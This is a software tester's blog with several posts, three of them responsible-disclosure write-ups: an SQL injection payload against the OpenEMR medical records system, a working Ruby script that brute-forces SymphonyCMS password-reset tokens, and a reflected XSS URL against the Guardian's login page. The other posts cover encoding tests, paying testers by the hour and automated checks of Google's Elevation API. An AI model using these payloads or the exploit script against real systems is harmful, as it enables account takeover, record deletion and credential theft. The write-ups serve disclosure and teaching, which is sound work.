Thursday, 12 June 2014

SQL Injection security flaw in OpenEMR medical records system.

I recently examined a popular open source medical records system named OpenEMR. A quick review of the application uncovered a SQL Injection vulnerability that would allow an attacker to execute their own SQL commands against the system. The attack is relatively textbook, and its detection and exploitation are outlined below. Firstly, a description of the product:
Profile: OpenEMR is a medical practice management software which also supports Electronic Medical Records (EMR). It is ONC Complete Ambulatory EHR certified and it features fully integrated electronic medical records, practice management for a medical practice, scheduling and electronic billing.

The server side is written in PHP and can be employed in conjunction with a LAMP "stack", though any operating systems with PHP-support are also supported.
...
In the US, it has been estimated that there are more than 5,000 installations of OpenEMR in physician offices and other small healthcare facilities serving more than 30 million patients. Internationally, it has been estimated that OpenEMR is installed in over 15,000 healthcare facilities, translating into more than 45,000 practitioners using the system which are serving greater than 90 million patients.


Source: Wikipedia: http://en.wikipedia.org/wiki/OpenEMR
Affected versions: OpenEMR 4.1.2 Patch 5 (and likely previous patches & releases)
Fix in: OpenEMR 4.1.2 Patch 6 

As usual I reviewed the system as a user, browsing features and recording my actions in my intercepting proxy (BurpSuite). This gave me a good idea of the default system features and usage model. Combined with a review of the online documentation, I gained a broad idea of how the system is used and its features or ‘claims’.

The latest/patched code was relatively well protected against SQL Injection, with widespread use of prepared statements, a good defence against 1st order SQL Injection. But I noticed a few queries were not parameterised. While this is not necessarily a problem, if it's possible to include custom input in the query then vulnerabilities can creep in.

In this case, the affected query was a delete for ‘Patient Disclosures’. When the user opts to delete a Disclosure record via the user interface the system runs this query, inserting the record identifier sent via the browser.

Unfortunately, the OpenEMR system does not filter out inappropriate characters for these requests, meaning SQL can be written unmodified into the request. As long as the injected SQL, when combined with the remainder of the query, is syntactically valid, the query is executed. If the code had restricted the input to, for example, positive integers, this vulnerability would be largely mitigated.

You can see the vulnerable code here:

File: openemr-4.1.2/library/log.inc

function deleteDisclosure($deletelid)
{
    $sql="delete from extended_log where id='$deletelid'";
    $ret = sqlInsertClean_audit($sql);
}

As you can see, the ID string is interpolated directly into the string used for the query.

As a proof of concept, I wrote a simple SQL fragment that, when injected, produces a valid but nefarious query. In this case, the query deletes all Patient Disclosures.

The malicious Request URL might look like this (the malicious characters are the URL-encoded portion after deletelid=5):

http://youropenemrserver/openemr/interface/patient_file/summary/disclosure_full.php?deletelid=5%27%20OR%20%271%27=%271

The active code inserted is:
' OR '1'='1

This generates a SQL query like this:
delete from extended_log where id='5' OR '1'='1'

The addition ensures every item in the table is deleted, not only the one with an id of 5. Other injections are of course possible; this one was chosen because it's a simple demonstration of SQL Injection. Typically an attacker would try to extract user credentials or confidential information - in this case possibly patient medical records.
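For anyone who wants to check the mechanics themselves, here is a minimal sketch in Ruby (standard library only, my own illustration rather than OpenEMR code). It decodes the suffix, builds the same string the vulnerable function would, and shows how a simple positive-integer check would have rejected the value:

require 'uri'

encoded   = "5%27%20OR%20%271%27=%271"
deletelid = URI.decode_www_form_component(encoded)   # => "5' OR '1'='1"

# The vulnerable function interpolates the value straight into the SQL string:
query = "delete from extended_log where id='#{deletelid}'"
puts query    # => delete from extended_log where id='5' OR '1'='1'

# A whitelist check such as "positive integers only" would have stopped it:
puts(deletelid =~ /\A\d+\z/ ? "accepted" : "rejected")   # => rejected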

One positive aspect of the flaw is that it is not pre-auth, so the attack only works when the attacker or exploit code has access to a valid logged-in session. This makes it slightly harder to exploit, but not overly so, as an attacker can use methods such as Cross-Site Request Forgery to initiate ‘blind’ attacks from another browser tab. But in summary, if OpenEMR is deployed only on a local network, this issue is not severe.

Note: I reported this issue in a process of responsible disclosure with a 30-day embargo. (That expired 5 days before a patch was released and 9 days before this post.)

The patch was released on the 8th June 2014 and is meant to address this issue among others. (Look for the fixes from Brady Miller to log.inc.) I have not tested this fix.

Monday, 24 March 2014

A security bug in SymphonyCMS (Predictable Forgotten Password Token Generation)


(This issue is now raised in OSVDB.)

On the 20th October 2013, The SymphonyCMS project released version 2.3.4 of their Content Management System. The release included a security fix for an issue I’d found in their software. The bug made it much easier for people to gain unauthorised access to the SymphonyCMS administration pages. More about that in a moment.

The date of the release is also relevant: it's a couple of days shy of 60 days after I had informed the development team of the issue. When I informed the team of the bug, I mentioned that I'd blog about the issue sometime on or after the 60 days had elapsed. (That was in line with my Responsible Disclosure policy at the time.)

Which product had the bug?


Symphony CMS is a web content management system, built in PHP. It appears to be used by several larger companies and organisations.


What was the bug?

The forgotten password functionality in v2.3.3 had a weakness. This meant an attacker could bypass the normal login process by pretending to ‘forget’ a user's password. It breaks down like this:

Firstly, The Attacker needed a username. That was not so difficult, as usernames are not secret and can be guessed. E.g.: John Smith might have a username of jsmith, john.smith etc.

With the username, The Attacker filled out the forgotten password form and made a note of the date & time when he did it. That bit was easy too; common browser plugins like Firebug tell you the time a server responds to any web page request.


Firebug shows the HTTP response with the server's date & time for the response


Now comes the interesting bit. The Symphony v2.3.3 code uses the date & time to calculate the special “too hard to guess” token it uses in the forgotten password email link. The PHP code on the server looks like this:

$token = substr(SHA1::hash(time() . rand(0, 1000)), 0, 6);

OK, so that's:

time()
Precise to the second in PHP. Easy: we got that from Firebug.

Add that to…

rand(0, 1000)
A random number between zero and 1000. Slightly harder, but guessing a thousand numbers is easy for a computer.

Then...

SHA1::hash(...)
Hashing does not make it harder to guess; I just have 1000 hashes instead of 1000 numbers now.

Then...

substr(..., 0, 6)
The first 6 characters. That actually makes it slightly easier, as some of those hashes may share the same first 6 characters.

As you might have worked out by now, The Attacker only has to make at most around 1000 guesses to access our user's account, knowing only their guessable username.

Given that, by default, SymphonyCMS allows users 2 hours to use the forgotten password link after it has been sent, I have plenty of time to guess them all. This is where some simple Ruby automation makes life even easier, as in this exploit:

#!/usr/bin/ruby

require 'watir-webdriver'
require 'digest/sha1'
require 'date'

puts "Number of arguments: #{ARGV.length}"

if ARGV.length !=2
    puts "Incorrect arguments!"
    puts "Usage:"
    puts "#{__FILE__} FQDN TIME_STRING"
    exit 2
end

browser = Watir::Browser.new
browser.goto 'about:blank'
puts "Time string: #{ARGV[0]}"

0.upto(1000) do |random_num_guess|
    target_timestamp = DateTime.parse( ARGV[1]).to_time.to_i.to_s

    token=Digest::SHA1.hexdigest(target_timestamp + random_num_guess.to_s )[0,6]

    exploit_url="http://#{ARGV[0]}/symphony/login/#{token}/"
    puts "Try #{random_num_guess} : #{exploit_url}"
    browser.goto exploit_url

    if browser.text.include? 'Retrieve password'
        puts "about:Blanking as the page is a login page."
        browser.goto 'about:blank'
    else
        puts "This URL worked:"
        puts exploit_url
        break   
    end

end # upto

The Ruby script above works through all 1000 combinations in a browser window, trying each one and stopping when it finds one that works. It leaves the browser window open, logged in and ready to use. As you can imagine, it's usually finished before the 1000th guess is reached. Even on a normal DSL / broadband connection, talking to a slow Amazon EC2 instance in Asia (I'm in the UK), the whole process took less than 5 minutes.

How did I find the vulnerability?


I started by checking for the low hanging fruit: simple XSS issues and ways to induce errors in any input forms and headers I could identify as useful. As usual, BurpSuite helped me see the details of the interactions and keep a record of what I had done. I traced the error-behaviour back to the code. That gave me a head start - I knew the relevant, easily accessible parts of the code, and I knew the happy and unhappy code paths.

Amongst these were the login process, and in particular the forgotten password functionality. This especially interested me, as it's an essential feature - but one that necessitates bypassing the main authentication system. Like a back-gate in the castle wall. Reading through the PHP code, and comparing it to the behaviour, I soon noticed the likely vulnerability. Adding debug output allowed me to check my assumptions - and soon I had a working exploit in Ruby.


Why SymphonyCMS?


Open source tools are a great place to practise your testing skills. You can examine the system as a black box, and then crack open the code repository and check the code and configuration. You can test your assumptions about how the system works. That's more than you can do with many proprietary software systems.

I’d noticed that the Symphony content management system was used by several media companies, a market sector I have considerable experience in. So it seemed like a good fit. You are also helping to improve the software available to everyone on the internet.


What happened when I reported it?


I forwarded the details, exploit code and a video of the issue to the development team. We discussed some options, and I pointed them towards a more secure way to create the tokens, using the PHP function openssl_random_pseudo_bytes.
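The underlying idea is to derive the token from a cryptographically secure random source rather than from the time of the request. Here is a rough illustration in Ruby (a sketch of the idea only - the actual fix is in PHP, using openssl_random_pseudo_bytes):

require 'digest/sha1'
require 'securerandom'

# Time-based token, like the vulnerable code: only ~1000 possibilities
# once an attacker knows the second the request was handled.
weak_token = Digest::SHA1.hexdigest(Time.now.to_i.to_s + rand(0..1000).to_s)[0, 6]

# Token from a cryptographically secure random source: not guessable from
# the request time, and long enough to resist brute force.
strong_token = SecureRandom.hex(16)

puts weak_token
puts strong_token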

The SymphonyCMS team implemented a fix and released it, as mentioned above. Unfortunately, the fix caused another issue - the forgotten password links no longer worked at all. (They lengthened the token in the URL but not the one it was compared against in the database.)

Sadly, I’ve been too busy to investigate the issue much since, or even write it up. (Yes, I’m writing about last year!)


Friday, 12 July 2013

Web application security testing - A Guardian website example.


When you read a blog post like this, or an article on a website, can you be sure it's the 'real thing'? How would you know if it had been doctored?

Let's assume the 'server' is fairly secure and hasn't been hacked into. So the content is going to be OK, isn't it? It looks OK... And we've checked the location bar at the top of our web browser and it definitely has the right website/company name. No funny-looking misspelled names that might mean we're reading a fake site.

And to be doubly sure, the browser's location bar states it's using HTTPS and even has that reassuring little padlock we've come to look for and trust. OK, so to recap:
  • The website's server is secured. (Well - for the purposes of this, let's give them the benefit of the doubt)
  • The logo, words, content and layout all appear to be kosher.
  • We are using the correct website address. (No unusual spellings e.g.: www.goole.com etc)
  • The page is secured using HTTPS. (Warm glow from the on-screen padlock)
(Don't worry - this actual page is not secured via HTTPS, unlike our hypothetical example above)

An increasing part of my testing is application-security related, investigating websites to answer just these sorts of questions. A few months ago, in my own time, I took a quick look at the Guardian website. I've used the Guardian as an example before; as well as interesting news, they have some cool API tools to learn with. Like many news websites, the Guardian lets users create an account and log in. This log-in form is essentially the front end to the Guardian's id.guardian.co.uk system, and like all software it has problems - things that can upset its users or owners.

Similar to 'normal' functional testing, you can reverse engineer how a web site or application works by a combination of trying different inputs and examining exposed parts of the system (JavaScript/HTML/Cookies etc). Security related issues are in some respects easier to find, as you are not constrained by 'typical' system usage. Those oft-ignored 'edge cases' are quite often useful attack vectors. But just like a functional problem, the context in which the bug exists is important - What is the cost to the company to fix/not-fix? What's the risk of not fixing? Are we a target for this sort of threat? Is this a compliance issue? Are we already being hacked in this way?

After examining how the Guardian's log-in page worked (in April), I found that the Guardian's 'id' system was vulnerable to a reflected cross-site scripting (XSS) attack. The web page could be 'polluted' with code or content that wasn't from the Guardian. In this case that was via the URL: I could include my own code and have it execute when the user loaded the page in their browser.

The 'reflected' term used above means that it's not the Guardian's website that contains the bad/polluting code; rather, their website just reflects the bad code back to the user when a web page is requested in a certain way. Visiting the Guardian's website directly, by manually typing in the URL, would make us immune to this particular issue. But unfortunately the Web is, errh, a web, and we click links all the time - especially on things like Facebook or Twitter, where the links are often obscured or shortened.

The bug could be exploited by amending a normal looking Guardian URL to include some extra/different data:

https://id.guardian.co.uk/signin?returnUrl=%27%0D%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28%27HACKED%27%29;//%0D%3C/SCRIPT%3E

(The issue is fixed now; the above URL no longer exploits it.)
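To see what the page actually receives, URL-decode the returnUrl parameter - a quick check in Ruby (standard library only, my own sketch):

require 'uri'

encoded = "%27%0D%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28%27HACKED%27%29;//%0D%3C/SCRIPT%3E"
payload = URI.decode_www_form_component(encoded)
puts payload
# %27 is a quote, %0D a carriage return, %3C and %3E are angle brackets, so the
# decoded value is:  '  </SCRIPT><SCRIPT>alert('HACKED');//  </SCRIPT>
# i.e. it closes the JavaScript string and script block, then starts a new
# script of the attacker's choosing.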

The web site would then incorporate that into its [returned] JavaScript code unchecked, instead of the normal, un-tampered returnUrl value:

...
  <script>
        function gPlusSigninCallback(authResult) {
            var fallbackButton = jQuery(".google-plus-fallback-button");
            var jsButton = jQuery(".google-plus-js-button")

            fallbackButton.addClass("hidden")
            jsButton.removeClass("hidden")

            if (authResult['error'] == undefined) {
                if(authResult['g-oauth-window']) {
                    jQuery.ajax({
                        url: 'https://id.guardian.co.uk/jsapi/google/autosignup',
                        cache: false,
                        async: true,
                        crossDomain: true,
                        dataType: 'jsonp',
                        data: {
                            accessToken : authResult.access_token
                        },
                        success : function() {
                            window.open('
'
</script><script>alert('HACKED');//
</script>
', '_parent');
                        }
                    });
                }
            }
        }
   
        <script type="text/javascript">
        (function() {
            var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
            po.src = 'https://apis.google.com/js/client:plusone.js';
            var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
        })();
    </script>

 ...

My XSS code would execute on that page when opened via this modified URL. That code can be used to rewrite parts of the page, read a user's cookies, or ask the user questions such as "What is your password?" E.g.:


The issue was particularly bad as it was on the log-in screen, a place where users would be expecting such a question. So despite being self-assured about the authenticity of the web page, thanks to it meeting the criteria mentioned above, a user could have been easily duped.

 

So what did I do?

I reported the issue to a contact at the Guardian and passed on the details of the bug. Following the conventions of Responsible Disclosure, I informed the Guardian of what I had found and that I might blog about the issue after a given time period had expired. This gives the company time to fix the issue, and gives security researchers like me credit for our work.

 

What did they do?

They fixed the bug, thereby protecting their users. They also said thanks. That's a lot more than some companies do, so I'm happy.

What can you do?

As a tester, you can start looking for these issues yourself in your own systems; there are plenty of resources available to help. For example, OWASP have a testing cheat sheet for many application security problems, including reflected XSS. Like other applications of exploratory testing, the real requirements are your skills and mind-set, and these come in part from experience.

Your security testing skills may not let you know in advance if a system has been hacked when you come to read it, but at least you will have the skills to find out whether it has been - or at least how easy it might be.

Wednesday, 3 October 2012

Simple test automation, with no moving parts.

Can you see the 74?
This is an Ishihara Color Test. It's used to help diagnose colour blindness; people with certain forms of colour blindness are not able to read the text contained in the image. The full set of 38 plates allows a doctor to accurately diagnose the colour-perception deficiencies affecting a patient.

The test is ingenious in its concept, yet remarkably simple in its execution. No complicated lenses, lighting, tools or measuring devices are required. The doctor or nurse can quickly administer the test with a simple and portable pack of cards.

The Ishihara test is an end to end test. Anything, from the lighting in the room to the brain of the patient, can influence the result. The examiner will endeavour to minimise many of the controllable factors, such as switching off the disco lights, asking the patient to remove their blue-tinted sun-glasses and maybe checking they can read normal cards (e.g. your patient might be a child).

End to end tests like this are messy; many factors can be in play, making classic pre-scripted test automation of minimal use, as the burden of coding for the myriad of issues can be prohibitive. Furthermore, despite their underlying complexity, end to end tests are often the most valuable – they can tell you if your system can do what your customer is paying for. For example, are your data-entry inputs making it out to the web? Are they readable by your users?


These Ishihara style tests are a quick way of analysing that end-to-end view. This is an area I have been looking into recently; here's an example of a Unicode-encoding detection file, as rendered by default in Firefox.


The fact that none of the text is legible tells us that the text is not being rendered in the common Unicode formats (known as UTF-8, UTF-16LE or UTF-16BE). This type of rendering problem is known as Mojibake. Depending on your context, that might be expected, as by default HTTP uses an older text encoding standard (labelled ISO 8859-1, which is similar to ASCII).

You can actually change how Firefox and Internet Explorer 'decode' the text for a page. These are the menus to do it in Firefox on Windows 7.


If I change Firefox to use the menu option "Unicode (UTF-16)" character encoding, this is what I see:





Notice the page tells me it is being rendered in UTF-16BE. Our special page has reverse engineered what the Firefox browser means by UTF-16. There are in fact two types of UTF-16, BE and LE (if you are interested, you can find out more about this Big Endian / Little Endian quirk). That's interesting - why did it use UTF-16BE? Is it using the default Big-Endian ordering of UTF-16's predecessor, UCS-2?

(Don’t worry this stuff IS ACTUALLY CONFUSING.)

If I change Firefox to use what is fast becoming the de-facto standard, UTF-8, the page tells us likewise:


I could do other similar investigations, such as checking the HTTP headers. I might also examine the page source and the encoding that has been configured there. But alas, it's not uncommon for these to differ for a given page. So how do we find out which encoding is actually being used? The Ishihara tests can help.
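Those first two checks are quick to script. Here's a Ruby sketch using only the standard library (the URL is a placeholder):

require 'net/http'
require 'uri'

uri = URI('http://example.com/page-under-test')    # placeholder URL
response = Net::HTTP.get_response(uri)

# The encoding the server claims in the HTTP header...
puts response['Content-Type']                       # e.g. "text/html; charset=ISO-8859-1"

# ...and the encoding declared in the page source - the two often disagree.
puts response.body[/<meta[^>]+charset[^>]*>/i]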

Unlike other methods, very little setup is required; the files just need to be included in the test system or its data. They are safe and simple - they don't execute any code at run time and are not prone to many of the usual programming-related maintenance issues.
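For a rough idea of how such a file can be constructed, here's a Ruby sketch of my own (not the actual file shown above - a real detection file is built more carefully, so that each line is only legible under one decoding):

# Write the same marker sentence in several encodings into one file.
# When the file is decoded, the line matching the decoder's encoding reads
# cleanly, while the others appear as Mojibake.
markers = {
  "UTF-8"    => "§ This line reads correctly when decoded as UTF-8 §",
  "UTF-16BE" => "§ This line reads correctly when decoded as UTF-16BE §",
  "UTF-16LE" => "§ This line reads correctly when decoded as UTF-16LE §",
}

File.open("encoding_ishihara.txt", "wb") do |file|
  markers.each do |encoding, text|
    file.write((text + "\n").encode(encoding))
  end
end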

When might you use Ishihara style tests? Whenever you suspect there is some medium that might be interfering with what you are seeing. For example, if you deploy a new cache in front of your website, it shouldn't change how the pages are actually encoded [should it?]. (Changes in encoding might change a page’s appearance - now you have a quick way to check the actual encoding in use.)

Remember that end-to-end view? Well if our system has multiple steps - which process or affect our text - then any one of those steps might in theory highlight an issue. So even if viewing our test file suggests it is being treated as UTF-8, this might just mean that for example our back-end content management system processed the file as UTF-8. The next step may have again changed the data to a different encoding. So while we can't always be sure what is affecting the Ishihara test text, we can at least see that something in that black box is affecting it in a visible way.

I've only scratched the surface here with the idea of Ishihara tests. They can provide greater resolution in issues such as character/text encoding, e.g. did that euro symbol display OK? Well, we know you are not using ASCII text encoding then, etc. The technique can be used elsewhere; have a try yourself. You can download the simple example above.

Monday, 10 September 2012

Cincinnati Test Store

Monday 3rd September 1827. A man steps off the road at the corner of Fifth and Elm, and walks into a store. He's frequented the store a few times since it opened, and he's starting to get to know the owner and his range of merchandise. In fact, like many people in town, he's becoming a regular customer.

He steps up to the counter; both he and the store owner glance at the large clock hanging on the wall and nod in unison. The shop-keeper makes a note of the time, and the two then begin a rapid discussion of requirements and how the shop keeper might be able to help. When they've agreed what's needed, the shop keeper prepares the various items, bringing them to the counter weighed, measured and packaged, ready for transport to the customer's nearby holding.

The store keeper then presents the bill to the customer, who glances at the clock again, and at the prices listed on the items arranged around the store's shelves, and then pays. The customer smiles as he loads the goods onto his horse, happy that he's gotten a good deal and yet been able to talk over his needs with the store keeper - for the items he knew least about. He also appreciated how his purchases were packed securely. As he was travelling back home that day, the extra cost of packing the goods was worth it given the rough ride they'd likely take on the journey.

The store was the Cincinnati Time Store, and the shop keeper was Josiah Warren. The store was novel in that it charged customers the base 'cost' of the items on sale plus a cost for the labour-time involved in obtaining the items and serving the customer. The store-keeper might also charge a higher rate for work he considered harder. The store was able to undercut other local stores, and Warren increased the amount of business he was able to transact.

Imagine if software testing was bought and sold in this manner. Many successful software testers here in London are contractors, and already work short contracts as and when it is agreeable to both parties. But even then, the time is usually agreed upfront, i.e. 3 months. Imagine if that time was available on demand, per hour?

What drivers would this put onto our work? and that of other team members?

You might want constant involvement from your testers, in which case the costs are fairly predictable. But remember, you are paying by the hour; you can stop paying for the testing at the end of each hour. Would you keep the tester being paid for the whole day? Week? Sprint? Even if they were not finding any useful information? If you found that pairing your testers with programmers full-time was not helping, you could save some money on the pure-programming parts of your plan. Conversely, your tester would be motivated to show they could pair and be productive - if they wanted to diversify their skills.

As the tester, I'm now financially motivated to keep finding new information. To keep those questions, success stories, bug reports coming. I'm only as good as my last report. If the product owner thinks she's heard enough and wants to ship - then she can stop the costs any-time, and ship.

The team might also want to hire a couple of testers, rather than just one. The testers might then be directly competing for 'renewal' at the end of the hour. I might advertise myself as a fast tester (or rapid tester) and sell my hours at a higher rate. I might do this because I've learned that my customer cares more for timeliness than cost per hour. For example the opportunity cost of not shipping the product 'soon' might be far greater than the cost of the team members. I'd then be motivated to deliver information quicker and more usefully than my cheaper-slower counterpart. My higher rate could help me earn the same income in less time and help the team deliver more sooner.

Has your team been bitten by test automation systems that took weeks or longer to 'arrive'? And maybe then didn't quite do what you needed? Or were flaky? If you were being paid by the hour, you would want to deliver the test automation, or more usefully the results it provides, in a more timely manner. You'd be immediately financially motivated to deliver actual test results, information or bug reports, incrementally, from your test automation. If you delivered automation that didn't help you provide more and better information each hour, how would you justify that premium hourly rate? What's more agile than breaking my test automation development work into a continuous stream of value-adding deliverables that will constantly be helping us test better and quicker?

Paying for testing by the hour would not necessarily lead to the unfortunate consequences people imagine when competition is used in the workplace. My fellow tester and I could split the work, maximising our ability to do the best testing we can. If my skills were better suited to testing the application's Java & Unix back-end, I'd spend my hour there. Meanwhile my colleague uses their expertise in GUI testing and usability to locate and investigate an array of front end issues.

Unfortunately a tester might also be motivated to drag out testing and drip-feed information back to the team. That's a risk. But a second or third tester in the team could help provide a competitive incentive, especially if those fellow testers were providing better feedback, earlier. Why keep paying Mr SlowNSteady when Miss BigNewsFirst has found the major issues after a couple of hours' work?

I might also be tempted to turn every meeting into a job justification speech. Product Owners would need to monitor whether this was getting out of hand - and becoming more than just sharing information.

I'm not suggesting this as a panacea for all the ills of software development or even testing in particular. What this kind of thinking does is let you examine what the companies that hire testers - want from testers. What are the customers willing to pay for? What are they willing to pay more for? From my experience, in recent contexts, customers want good information about their new software and they want it quickly - so the system can be either fixed and/or released quickly.

Monday, 14 May 2012

Using test automation to help me test, a Google Elevation API example


Someone once asked me if "testing a login-process was a good thing to 'automate'?" We discussed the actual testing and checking they were concerned with. Their real concern was that their product's 'login' feature was a fundamental requirement: if that was 'broken' they wanted the team to know quickly and to get it fixed quicker. A failure to login was probably going to be a show-stopping defect in the product. Another hope was that they could 'liberate' the testers from testing this functionality laboriously in every build/release etc.

At this point the context becomes relevant; the answers can change depending on the team, company and application involved. We have an idea of what the team are thinking - we need to think about why they have those ideas. For example, do we host or own the login/authentication service? If not, how much value is there in testing the actual login process? Would a mock of that service suffice for our automated checks?

What are we looking for in our automated checks? To see it work? For one user? One user at a time? One type of user at a time? I assume we need to check the inverse of these as well, i.e.: does it reject a login for an unacceptable user? Otherwise we could easily miss one of the most important tests - do we actually allow and disallow user logins as required?

These questions soon start to highlight the point at which automation can help and complement testing. That is to say, test automation probably wouldn't be a good idea for testing a single user login, but would probably be a good idea for testing 100 or 1000 logins or types of login. Your testers will probably have to log in to use the system themselves, so will inevitably use and eyeball the login process from a single-user perspective. They are unlikely to have the time, or patience, to test a matrix of 1000 user logins and permissions. Furthermore, the login service could take advantage of the features automation can bring. For example, the login service could be accessed directly and the login API called in whatever manner the tester desires (sequential, parallel, duplicates, fast, slow, random etc). These tests could not practically be performed by one person, and yet are likely to be realistic usage scenarios.
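To make that concrete, a data-driven login check might look something like the sketch below. The endpoint, accounts and expected outcomes are entirely hypothetical - the point is the shape of the idea, not a real API:

require 'net/http'
require 'uri'
require 'json'

# Hypothetical login endpoint and test accounts - placeholders, not a real system.
LOGIN_URI = URI('https://example.test/api/login')

accounts = [
  { user: 'jsmith',        password: 'correct-password', should_succeed: true  },
  { user: 'jsmith',        password: 'wrong-password',   should_succeed: false },
  { user: 'disabled.user', password: 'any-password',     should_succeed: false },
  # ...hundreds more rows, generated or read from a file
]

accounts.each do |account|
  response = Net::HTTP.post(LOGIN_URI,
                            { user: account[:user], password: account[:password] }.to_json,
                            'Content-Type' => 'application/json')
  succeeded = (response.code == '200')
  flag = (succeeded == account[:should_succeed]) ? 'as expected' : 'INVESTIGATE'
  puts "#{account[:user]} / #{account[:password]}: login #{succeeded} - #{flag}"
end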

An investigation using reasoning and test automation such as this, playing to the computer's strengths, can have the desired knock-on effect of liberating the tester, and can even provide them with intelligence [information] to aid finding out more information or bugs. The questioning about what they want, what they need and what they are working with all sprang from their desire to find out about a specific application of test automation.

For example, I recently practised some exploratory test automation on the Google Maps API, in particular the Elevation API. The service, in exchange for latitude and longitude values, returns an elevation in metres. The API is designed for use in conjunction with the other Google Maps APIs, but can be used directly without login, via a simple URL. If we had to test this system, maybe as a potential customer, or if I was working with the developers, how might we do that? How might test automation help?

I start by skim-reading the documentation page, just as much as I need to get started. Firstly, as a tester, I can immediately bring some issues to light. I can see the page does not provide an obvious indication of what it means by 'elevation'. Is that elevation above sea level? If so, does it refer to height above Mean High Water Spring, as is typical for things such as bridges over the sea or river estuaries? Or is it referring to the height above 'chart datum', a somewhat contrived estimate of a mean low tide? I make a note; these questions might well be important to our team, but are not instantly answerable.

There's more information on nautical charts.

The documentation also doesn't readily indicate what survey the data is based on (WGS84, OSGB36 etc). While this won't cause you much concern for plotting the location and elevation of your local pizza delivery guy, it might cause concern if you are using the system for anything business critical. For example, the two systems mentioned, WGS84 and OSGB36, can map the same co-ordinates to locations 70 metres apart. Again, context questions are arising. Who'd use this system? If you are hill walking in England or Scotland, the latter is likely to be the system used by your Ordnance Survey maps. But your handheld GPS system is likely to default to the American GPS convention of WGS84. Again, important questions for our team: what will the information be used with? By whom? Will it be meaningful and accurate when used with other data?

Starting to use the API, as with most software, is one of the best ways to find out how it does and does not work. I could easily check to see if a single request will deliver a response, with a command like this, e.g.:

curl -s 'http://maps.googleapis.com/maps/api/elevation/json?locations=10,1&sensor=false'

I tried a few points, checking the sorts of responses I receive. The responses are JSON by default, indented for readability, and the co-ordinates and elevation are given to several decimal places. There again, more questions... Does it need to be human readable? Should we save on bandwidth by leaving out the whitespace? Should the elevation be given to 14 decimal places? Here is an example response:

{
   "results" : [
      {
         "elevation" : 39.87668991088867,
         "location" : {
            "lat" : 50.67643799459280,
            "lng" : -1.235103116128651
         },
         "resolution" : 610.8129272460938
      }
   ],
   "status" : "OK"
}

Were the responses typical? To get a bigger sample of data, I decided to request a series of points across a large area. I chose the Isle of Wight, an area to the south of England that includes areas above & below sea level and is well charted. If I see any strange results I should be able to get a reference map to compare the data against reasonably easily. I also chose to request the points at random rather than request them sequentially. This would allow me to get an overall impression of the elevations with a smaller sample. It would also help to mitigate any bias I might have in choosing latitude or longitude values. I used Ruby's built-in rand method to generate the numbers. While not truly random, or as random as those found at random.org, they are likely to be considerably more random than those I might choose myself.

I quickly wrote a simple unix shell script to request single elevation points, one pair of co-ordinates at a time. The points would be chosen at random within the bounds decided (the Isle of Wight and its surrounds). The script would continue requesting continuously, pausing slightly in between each request to avoid overloading the server and being blocked. The results are each directed to a numbered file. A simple script like this can be quickly written in shell, Ruby or similar and left to work in our absence. Its simplicity means maintenance and upfront costs are kept to a minimum. No days or weeks of 'test framework' development or reworking. My script was less than a dozen lines long and was written in minutes.
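The original was a throwaway shell script; a Ruby sketch of the same idea looks like this (standard library only - the bounding box values are illustrative, not the exact ones I used):

require 'net/http'
require 'uri'

# Rough bounding box around the Isle of Wight (illustrative values).
LAT_RANGE = 50.55..50.80
LNG_RANGE = -1.60..-1.05

1.upto(10_000) do |i|
  lat = rand(LAT_RANGE)
  lng = rand(LNG_RANGE)
  uri = URI("http://maps.googleapis.com/maps/api/elevation/json?locations=#{lat},#{lng}&sensor=false")
  File.write("response_#{i}.json", Net::HTTP.get(uri))
  sleep 1   # pause between requests, to be kind to the service
end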

Left to run in the background, while I focused on other work, the script silently did the mundane work we are not good at, but computers excel at. Using the results of these API requests I hoped to chart the results, and maybe spot some anomalies or erroneous data. I thought they might be easier to 'notice' if presented in graphical form.

Several hours later, I examined the results. This is where unix commands become particularly useful; I can easily 'grep' every file (in a folder now full of several thousand responses) for any lines of text that contain a given string. I looked at the last few responses from the Elevation API, and noticed that the server had stopped serving results as I had exceeded the query limit. That is, I had requested more elevation values than are allowed under the service's terms of service. That's useful information: I can check whether the server started doing this after the right period of time - and how it calculates that. I now have more questions and even some actual real data I can re-analyse to help.

Often test automation ignores most of the useful information, and is reduced to a simple Pass/Fail check on one or a handful of pre-defined checks. But if you keep all the data, you can re-process it at any time. I tend to dump it all to individual files, log files or even a database. Then you can often re-start analysing the system using the recorded data very quickly, and test your ideas against the real system.

In our Google Elevation API example, using grep, I quickly scanned every file to see all results that were accepted. The command looked like this:

grep "status" * | grep  -v OVER_QUERY_LIMIT

In half a second the command had searched through over 12 thousand results and presented me with the names of the files and the actual lines that include the 'status' response. A quick scroll through the results and a blink test highlights that there is in fact another type of result. As well as those that exceeded the query limit and those that were OK, there is a third group that return an UNKNOWN_ERROR. Another quick scan of the documentation shows that this is one of the expected response statuses for the API. I quickly retried the few requests that failed, using the same latitude and longitude values - they worked and returned seemingly valid data. This suggests that these failures were intermittent. The failures indicated a useful point: the system can fail, and unpredictably.

More questions... How reliable is the system? Is it reliable enough for my client?

A quick calculation, based on the number of requests and failures, showed that although I had only seen a few failures, that was enough to take the availability of the service from 100% down to just under 99.98%. That's often considered good, but if, for example, my client was paying for 4 nines (99.99%), they'd want to know - if only to give them a useful negotiation point in contract renewals. I re-ran this test and analysis later and saw a very similar result, so it appears this might be a useful estimate of the service's availability.
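The arithmetic is trivial, but worth spelling out because a handful of failures has a surprisingly large effect on the 'nines'. A sketch with illustrative counts (not the exact figures from my run):

total    = 12_000          # illustrative: roughly the size of my sample
failures = 3               # illustrative: a handful of UNKNOWN_ERROR responses

availability = (total - failures) * 100.0 / total
puts format('%.3f%%', availability)   # => "99.975%" - already below a 99.99% target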

Using the data I had collected, I wrote a short Ruby script that read the JSON responses and output a single CSV file containing the latitude, longitude and elevation. Ruby is my preference over shell for this type of task, as it has built-in libraries that make the interpretation of data in XML, JSON and YAML form almost trivial. I then fed these results into GNUPlot, a simple and free chart-plotting tool. GNUPlot allowed me to easily change the colour of plotted points depending on whether the elevation was positive or negative.
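The conversion script looked something like this sketch (not the original; the response_*.json filenames follow the earlier sketch, and the JSON fields are those shown in the example response above):

require 'json'
require 'csv'

CSV.open('elevations.csv', 'w') do |csv|
  csv << %w[lat lng elevation]
  Dir.glob('response_*.json').each do |path|
    data = JSON.parse(File.read(path))
    next unless data['status'] == 'OK'
    data['results'].each do |result|
      csv << [result['location']['lat'], result['location']['lng'], result['elevation']]
    end
  end
end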

Here's the result:



